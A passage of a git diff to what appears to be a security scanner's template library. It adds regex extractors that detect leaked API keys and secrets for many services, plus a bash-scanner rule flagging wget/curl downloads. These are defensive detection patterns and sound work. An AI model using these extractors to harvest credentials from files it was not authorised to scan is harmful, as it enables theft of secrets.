classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: firewall,config,audit,pfsense,file - file: - extensions: - xml @@ -23,3 +25,6 @@ file: - "" - "domain>" condition: and + +# Enhanced by md on 2023/05/04 +# digest: 4a0a00473045022052d3112a4e98adccd6b8fccd98f95244557d07eb4caef53dc9f09b7f996d642e022100e56f7d85f2d9bcbb8a03fc01e20588b9d2cb93de814a82b1e77069c2b48be485:922c64590222798bb761d5b6d8e72950 diff --git a/file/bash/bash-scanner.yaml b/file/bash/bash-scanner.yaml index 4b2f282061..bc6fb3c559 100644 --- a/file/bash/bash-scanner.yaml +++ b/file/bash/bash-scanner.yaml @@ -9,7 +9,6 @@ info: - https://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/ - https://phoenixnap.com/kb/dangerous-linux-terminal-commands tags: bash,file,shell,sh - file: - extensions: - sh @@ -45,3 +44,5 @@ file: name: unknown filedownload regex: - '(wget|curl) (https?|ftp|file)://[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]\.[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]$' + +# digest: 4a0a00473045022100db6e5f84fe8da8728aa4f05dd83a5d033d062fe552a148d3cf2fd599277d1eaf022040d4296bef6df6b57b8381af30fc75730d9bf8103ce7d37bdcfbe91317fc5344:922c64590222798bb761d5b6d8e72950 diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index 228af1cb3d..e62244eac0 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -1,13 +1,16 @@ id: electron-version-detect info: - name: Electron Version Detect + name: Electron Version - Detect author: me9187 severity: info reference: - https://www.electronjs.org/blog/chromium-rce-vulnerability/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: electron,file - file: - extensions: - json @@ -16,3 +19,5 @@ file: - type: regex regex: - '"electronVersion":"[^"]*"' + +# digest: 4b0a00483046022100a04f77fdda5916ff33b294ee3addb5451db77585a39ae8673f4cdfed08974d7b022100d421b8bd0600e4310c8ef55ea0b2a18771258f3c6c6ab884e8d661a6965c3112:922c64590222798bb761d5b6d8e72950 diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml index d0e3061b56..db3a9d4f8a 100644 --- a/file/electron/node-integration-enabled.yaml +++ b/file/electron/node-integration-enabled.yaml @@ -10,15 +10,12 @@ info: - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps tags: electron,file,nodejs - file: - extensions: - all - matchers: - - type: word words: - "nodeIntegration: true" -# Enhanced by mp on 2022/05/19 +# digest: 4a0a00473045022070caab60eefc323b37e341d70c757d85c7fedf66d0e35b51a425a8aa7ec6c847022100bca4045fc5d68b14d123532d732daa73ffbc5af0e124764325706d859da74e9f:922c64590222798bb761d5b6d8e72950 diff --git a/file/js/js-analyse.yaml b/file/js/js-analyse.yaml index 37be032685..0fef7c55ce 100644 --- a/file/js/js-analyse.yaml +++ b/file/js/js-analyse.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: file,js-analyse,js,javascript - file: - extensions: - js @@ -31,3 +30,5 @@ file: name: extracted-uri regex: - "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+" + +# digest: 490a004630440220295fa966d911a692e343adc830f080654abda1d1b1f3e59a421a54a5e9d29fe802203b8bf407243a4e13d0567bf99a9c6b4f6bcb863600c1a6a54c53cc67bec50f51:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/adafruit-key.yaml b/file/keys/adafruit-key.yaml new file mode 100644 index 0000000000..f80ffce8b3 --- /dev/null +++ b/file/keys/adafruit-key.yaml @@ -0,0 +1,23 @@ +id: adafruit-key + +info: + name: Adafruit API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go + metadata: + verified: true + tags: adafruit,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100e18e66c25918d1d8e980ab39a1d206e65dc34ef8b6ae0e043c87d34f0496d4260220651cd87fb75b897e27766f354e0711534ef67b6f368885d00fbf79ed44ed72a7:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/adobe/adobe-client.yaml b/file/keys/adobe/adobe-client.yaml new file mode 100644 index 0000000000..bc0d0a5db7 --- /dev/null +++ b/file/keys/adobe/adobe-client.yaml @@ -0,0 +1,23 @@ +id: adobe-client + +info: + name: Adobe Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go + metadata: + verified: true + tags: adobe,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100eff30b8e55f06b16c9d6319765c2ad58854c26856e355f039d1d5414b5d8258f02205c05e1a7b8edf37112c3c501eafc3207179c8e9afdda5f9c6ca93dc1dc7b9438:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/adobe-secret.yaml b/file/keys/adobe/adobe-secret.yaml similarity index 71% rename from file/keys/adobe-secret.yaml rename to file/keys/adobe/adobe-secret.yaml index 1d16b548d8..3f2dbc2343 100644 --- a/file/keys/adobe-secret.yaml +++ b/file/keys/adobe/adobe-secret.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: adobe,oauth,file,token - file: - extensions: - all @@ -21,4 +20,6 @@ file: - type: regex part: body regex: - - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)' \ No newline at end of file + - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)' + +# digest: 4b0a0048304602210086cdebe3a78bf4282ea6b7e8107b833e98c6242501edc53c34ffad1d06dd8d760221009a912c40a016bdff61787eeb9d6fc9386c840a2b69b4c96915612c00fce6b493:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/age/age-identity-secret-key.yaml b/file/keys/age/age-identity-secret-key.yaml index 8efe8f0583..eb87ea96de 100644 --- a/file/keys/age/age-identity-secret-key.yaml +++ b/file/keys/age/age-identity-secret-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: age-encryption,file,token - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' \ No newline at end of file + - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' + +# digest: 4a0a0047304502201a1f14a0a6f72bbd8e353c6db3647c596ccee294516249b42df3757df4fa56b7022100fe1dc8b4a2e83bd842dced9fff217732d392b28eb0dd027f7e6f75f5aff9d634:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/age/age-recipient-public-key.yaml b/file/keys/age/age-recipient-public-key.yaml index c498efbc3f..4e4f7ba2e9 100644 --- a/file/keys/age/age-recipient-public-key.yaml +++ b/file/keys/age/age-recipient-public-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: age-encryption,file,token - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - '\bage1[0-9a-z]{58}\b' \ No newline at end of file + - '\bage1[0-9a-z]{58}\b' + +# digest: 4a0a004730450221009fb14853721aa355f4dff9b164fd098ba99f8c579e3ef82325210e6fbbb8918f02203f2a50f4e91298e867107a4af77f80f70cbc2a5c7cad4fa4133d2d7233d51dda:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/airtable-key.yaml b/file/keys/airtable-key.yaml new file mode 100644 index 0000000000..5ebf9b4354 --- /dev/null +++ b/file/keys/airtable-key.yaml @@ -0,0 +1,23 @@ +id: airtable-key + +info: + name: Airtable API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go + metadata: + verified: true + tags: airtable,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100f69a839cd0ef13a477e8e796614040b37eec85526932dca4bdf07ab3ff75f469022100ac62c27426f5f61546e702024dc2ab3293981cc05780460a2565bc9cb2c98ab8:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/algolia-key.yaml b/file/keys/algolia-key.yaml new file mode 100644 index 0000000000..69d977c2c2 --- /dev/null +++ b/file/keys/algolia-key.yaml @@ -0,0 +1,23 @@ +id: algolia-key + +info: + name: Algolia API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go + metadata: + verified: true + tags: algolia,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/alibaba/alibaba-key-id.yaml b/file/keys/alibaba/alibaba-key-id.yaml new file mode 100644 index 0000000000..9c284d3270 --- /dev/null +++ b/file/keys/alibaba/alibaba-key-id.yaml @@ -0,0 +1,23 @@ +id: alibaba-key-id + +info: + name: Alibaba Access Key ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go + metadata: + verified: true + tags: alibaba,access,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022010d9489b8b59a742d40af13eab87d1a56acc81ae51021beacd81f2cb3c2020670221008cfa46cab56f8ffd121bb8dad1d515c8136517f1da385fe6d1c364fcb95ef9b2:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/alibaba/alibaba-secret-id.yaml b/file/keys/alibaba/alibaba-secret-id.yaml new file mode 100644 index 0000000000..0097be91f9 --- /dev/null +++ b/file/keys/alibaba/alibaba-secret-id.yaml @@ -0,0 +1,23 @@ +id: alibaba-secret-id + +info: + name: Alibaba Secret Key ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go + metadata: + verified: true + tags: alibaba,secret,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a00463044022035a425a3c37a997471e5a91829014ba9e0e5be1e272e0cecd67317fcd54f5ea202204eaf1dd7997603c327ade970d78398373e7aa475aed015b70c2c6f2ec012c25d:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/amazon/amazon-account-id.yaml b/file/keys/amazon/amazon-account-id.yaml index c078f9022d..01ffd5b250 100644 --- a/file/keys/amazon/amazon-account-id.yaml +++ b/file/keys/amazon/amazon-account-id.yaml @@ -1,15 +1,19 @@ id: amazon-account-id info: - name: AWS Account ID + name: Amazon Web Services Account ID - Detect author: DhiyaneshDK severity: info + description: Amazon Web Services Account ID token was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: aws,amazon,token,file - file: - extensions: - all @@ -18,4 +22,7 @@ file: - type: regex part: body regex: - - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' \ No newline at end of file + - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' + +# Enhanced by md on 2023/05/04 +# digest: 490a0046304402204cdf5ae5eafb194436533d3bd5d707d3ed6e82bde669a90a33d3d6e7f841a4f1022016cc2daac84b2c82e2566fd7f5c68b83f2f1cbf93a5a19d259ac963a0ac330d0:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/amazon/amazon-mws-auth-token.yaml b/file/keys/amazon/amazon-mws-auth-token.yaml index 0ab5703b9c..8ed5b31604 100644 --- a/file/keys/amazon/amazon-mws-auth-token.yaml +++ b/file/keys/amazon/amazon-mws-auth-token.yaml @@ -1,11 +1,15 @@ id: amazon-mws-auth-token-value info: - name: Amazon MWS Auth Token + name: Amazon MWS Authentication Token - Detect author: gaurang severity: medium + description: Amazon MWS authentication token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: token,file,amazon,auth - file: - extensions: - all @@ -14,3 +18,6 @@ file: - type: regex regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# Enhanced by md on 2023/05/04 +# digest: 4a0a00473045022100a22e9ab4357449ff0b0d0e1d56fd2a2a815900eb260c13cdc8ca5b4904508d76022030e701c98fff70a3c0e8174fe27c30c87c60b0a4acdc97555a71970ab6e5e83a:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/amazon/amazon-session-token.yaml b/file/keys/amazon/amazon-session-token.yaml index e24dd7890f..8a6529f2b4 100644 --- a/file/keys/amazon/amazon-session-token.yaml +++ b/file/keys/amazon/amazon-session-token.yaml @@ -1,15 +1,19 @@ id: amazon-session-token info: - name: Amazon Session Token + name: Amazon Session Token - Detect author: DhiyaneshDK severity: info + description: Amazon session token was detected. reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: aws,amazon,token,file,session - file: - extensions: - all @@ -18,4 +22,7 @@ file: - type: regex part: body regex: - - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' \ No newline at end of file + - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' + +# Enhanced by md on 2023/05/04 +# digest: 490a00463044022042bbced45aee0d6943da5aac1efe8367af4c8d494a624bf45d428530a6fcba6e02204537fb05ae1ae72607f23bf06b9c8e0d20b917ba425905e80ce47cc7835d0a70:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/amazon/amazon-sns-token.yaml b/file/keys/amazon/amazon-sns-token.yaml index 96d12f5fbb..a01fae90d0 100644 --- a/file/keys/amazon/amazon-sns-token.yaml +++ b/file/keys/amazon/amazon-sns-token.yaml @@ -1,11 +1,15 @@ id: amazon-sns-token info: - name: Amazon SNS Token Detect + name: Amazon SNS Token - Detect author: TheBinitGhimire severity: info + description: Amazon SNS token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: file,token,amazon,aws - file: - extensions: - all @@ -15,3 +19,6 @@ file: name: amazon-sns-topic regex: - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' + +# Enhanced by md on 2023/05/04 +# digest: 4a0a004730450220498ac9e1f8922b28f9d1bdf0b66f41b9d55ab995d2eae1c6b4fc40b0bd7b39e5022100dae071582233b67060a20eda722d8204d7fc923666496cb98c164f884e09d8d7:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/amazon/aws-access-id.yaml b/file/keys/amazon/aws-access-id.yaml index 1bf83e581c..f05c27ae8e 100644 --- a/file/keys/amazon/aws-access-id.yaml +++ b/file/keys/amazon/aws-access-id.yaml @@ -1,11 +1,15 @@ id: aws-access-key info: - name: AWS Access Key ID + name: Amazon Web Services Access Key ID - Detect author: gaurang severity: info + description: Amazon Web Services Access Key ID token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: token,file - file: - extensions: - all @@ -14,3 +18,6 @@ file: - type: regex regex: - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" + +# Enhanced by md on 2023/05/04 +# digest: 4a0a00473045022001180031643147e369ad54d397f6e1ec99e061e1a771b8ec6b9f024bb97300a7022100b5b3b3027d3e8edea6822f05c18070f5cbd64b111c6ac7aa37e3603fcb4b08ea:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index d6d5f5f8e7..b6f22f0a39 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -1,11 +1,15 @@ id: aws-cognito-pool info: - name: AWS Cognito Pool ID + name: Amazon Web Services Cognito Pool ID - Detect author: gaurang severity: info + description: Amazon Web Services Cognito Pool ID token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: token,file - file: - extensions: - all @@ -30,3 +34,6 @@ file: - "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" + +# Enhanced by md on 2023/05/04 +# digest: 4b0a00483046022100b065a7fffa3f1696948239b6546af3ff6d33ddd2ab72ce11e55831f029a152c5022100ce912a53c74a47179c62dbf4a78e93a8f5fdcbbbf497a94e6e4f4ef2e76efd91:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/asana/asana-clientid.yaml b/file/keys/asana/asana-clientid.yaml new file mode 100644 index 0000000000..69f4141960 --- /dev/null +++ b/file/keys/asana/asana-clientid.yaml @@ -0,0 +1,23 @@ +id: asana-clientid + +info: + name: Asana Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml + metadata: + verified: true + tags: asana,client,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100b5bca9cba24b0a4f3098d7a320c20a2152d1a115ea4677c6ca9eb9db50503b29022100c3189ce143a347cdb085e6eefa198c7c990e16049efd071154f7012490783fac:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/asana/asana-clientsecret.yaml b/file/keys/asana/asana-clientsecret.yaml new file mode 100644 index 0000000000..fc9c5b5ece --- /dev/null +++ b/file/keys/asana/asana-clientsecret.yaml @@ -0,0 +1,23 @@ +id: asana-clientsecret + +info: + name: Asana Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml + metadata: + verified: true + tags: asana,client,file,keys,secret +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502206b120f6ce1d96f67b8b676972a3f185e765c9b078a4023386c0aac41ca5f9ce6022100e263135d7df9faa92ca170f9da0cb5498ae505b0f70226672dcfed5dc23d13b5:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/atlassian/atlassian-api-token.yaml b/file/keys/atlassian/atlassian-api-token.yaml new file mode 100644 index 0000000000..0a56b5285c --- /dev/null +++ b/file/keys/atlassian/atlassian-api-token.yaml @@ -0,0 +1,23 @@ +id: atlassian-api-token + +info: + name: Atlassian API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml + metadata: + verified: true + tags: atlassian,file,token,api +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100f0bda35ab0c6f042d2fe14f13a5f210b1dc29f733309f6b8f4da56ce8fa8bfcb022100a0e0348deb81e70fd2cdb84edb4365eba4d60a08075348d8ada6a6e0c7e687b4:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/azure/azure-connection-string.yaml b/file/keys/azure/azure-connection-string.yaml index 63e1b08ef4..ab54214470 100644 --- a/file/keys/azure/azure-connection-string.yaml +++ b/file/keys/azure/azure-connection-string.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: azure,file,token - file: - extensions: - all @@ -21,3 +20,5 @@ file: part: body regex: - (?i)(?:AccountName|SharedAccessKeyName|SharedSecretIssuer)\s*=\s*([^;]{1,80})\s*;\s*.{0,10}\s*(?:AccountKey|SharedAccessKey|SharedSecretValue)\s*=\s*([^;]{1,100})(?:;|$) + +# digest: 4b0a00483046022100e3adc030f2440f9928c46dd7ba3c430433c9b61b05b9c6fa51b61386028de5a502210084816e5118a166f01afc27f551f211c50e2200b9b7376bc224a4ba6a2f983750:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/beamer-api-token.yaml b/file/keys/beamer-api-token.yaml new file mode 100644 index 0000000000..0e074c8f8a --- /dev/null +++ b/file/keys/beamer-api-token.yaml @@ -0,0 +1,23 @@ +id: beamer-api-token + +info: + name: Beamer API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go + metadata: + verified: true + tags: beamer,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100ea817ba9e3e2eb94ea5c101e7d41b53768607d2eac0eb3674360c0f7a3b1ff0f0220343c93b390729b5c35e68f3c11aa7cd1b653cf4dc248a3081bbee7ee2dfe8762:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/bitbucket/bitbucket-client-id.yaml b/file/keys/bitbucket/bitbucket-client-id.yaml new file mode 100644 index 0000000000..3e89bea41d --- /dev/null +++ b/file/keys/bitbucket/bitbucket-client-id.yaml @@ -0,0 +1,23 @@ +id: bitbucket-client-id + +info: + name: BitBucket Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go + metadata: + verified: true + tags: bitbucket,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502201d21d831f228092a48fbaca110d697441266b632058d244ce2f20498b0e6000c022100ee669aafd4ecd541fd947246bb16d689558c0957c790f0c5046431fea45b5535:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/bitbucket/bitbucket-client-secret.yaml b/file/keys/bitbucket/bitbucket-client-secret.yaml new file mode 100644 index 0000000000..906bd043c6 --- /dev/null +++ b/file/keys/bitbucket/bitbucket-client-secret.yaml @@ -0,0 +1,23 @@ +id: bitbucket-client-secret + +info: + name: BitBucket Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go + metadata: + verified: true + tags: bitbucket,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a004730450220077c0a8011a358c155733dbfe67dfc5b4984e6e5ed7ac87be17c696422f33918022100fbb6ed954223d2567fb5c462f9902038f8fd1e2f0203cf2f277d5b75ab469740:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/bittrex/bittrex-access-key.yaml b/file/keys/bittrex/bittrex-access-key.yaml new file mode 100644 index 0000000000..713783b86e --- /dev/null +++ b/file/keys/bittrex/bittrex-access-key.yaml @@ -0,0 +1,23 @@ +id: bittrex-access-key + +info: + name: Bittrex Access Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go + metadata: + verified: true + tags: bittrex,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502204d0670fdc66229097bc3957b07710ce86dccba983dfa36c3c980bc7fe748d229022100a77a41e67b147b7408dbc4d590e1701095a148ab10fbcc8d547d132c93a458c8:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/bittrex/bittrex-secret-key.yaml b/file/keys/bittrex/bittrex-secret-key.yaml new file mode 100644 index 0000000000..145a3802f4 --- /dev/null +++ 